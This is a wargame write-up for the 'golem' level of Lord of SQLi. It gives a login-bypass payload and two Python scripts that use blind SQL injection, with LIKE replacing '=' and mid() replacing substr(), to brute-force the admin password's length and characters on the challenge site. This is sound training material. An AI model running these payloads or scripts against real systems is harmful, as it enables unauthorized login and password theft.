
Author: Universe7202

Hint 1.   You already know the or/and bypass technique. This time = is blocked. How do you get around it?

Hint 2.   That's right, blind...

Hint 3.   But substr is blocked as well. How do you get around that?


Solution.
This challenge taught me a new bypass technique.
To get around the blocked =, you can use like instead.
First, let's log in as admin:
?pw=1' || id like 'admin

Having got this far, we can now find out admin's pw.
Let's find the length of pw first (%26%26 is the URL-encoded &&, and %23 is the URL-encoded #, which comments out the rest of the query):
1' || id like 'admin' %26%26 length(pw) like 1%23


import requests
import time

header = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36',
          'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
          'Accept-Language': 'ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7',
          'Cookie': 'PHPSESSID=값값값값값',   # placeholder: put your own session id here
          'Connection': 'close'
          }

######## Find the password length #######

print("Searching password length...")
for count in range(1, 20):
    time.sleep(0.5)
    # "length(pw) like N" stands in for the blocked '='; %26%26 is && and %23 is # (comments out the rest)
    url = "http://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php?pw=1' || id like 'admin' %26%26 length(pw) like " + str(count) + "%23"
    req = requests.get(url, headers=header)
    print(url)
    if req.text.find("<h2>Hello admin</h2>") != -1:      # find() returns -1 when the success marker is absent
        print("password length : %d" % count)
        break


But substr is blocked too. I looked for a bypass and found that there are functions called left, right and mid (first time I'd heard of them).
I used mid, together with a bit of Python, to solve the challenge.


import requests
import time

# Candidate characters, tried in this order. Note that '%' and '_' are LIKE wildcards
# ('%' matches anything, '_' any single character), so they must stay at the end of the
# list or they will produce false positives; LIKE is also case-insensitive under MySQL's
# default collation, so this list only needs lowercase letters.
wordList = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',
            '0','1','2','3','4','5','6','7','8','9','!','@','#','$','%','^','&','*','(',')']
header = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36',
          'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
          'Accept-Language': 'ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7',
          'Cookie': 'PHPSESSID=ep5kj560e636jh9p6d21h7vc14',
          'Connection': 'close'
          }

passwdLen = 8        # found by the length search above
result = ''
print("Searching password...")
for count in range(1, passwdLen + 1):
    for ch in wordList:
        time.sleep(2)
        # mid(pw, N, 1) stands in for the blocked substr(); the comparison again uses like instead of =
        url = "http://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php?pw=1' || id like 'admin' %26%26 mid(pw," + str(count) + ",1) like '" + ch + "'%23"
        req = requests.get(url, headers=header)
        print(url)
        if req.text.find("<h2>Hello admin</h2>") != -1:  # find() returns -1 when the success marker is absent
            result += ch
            print(ch)
            break
print("password : " + result)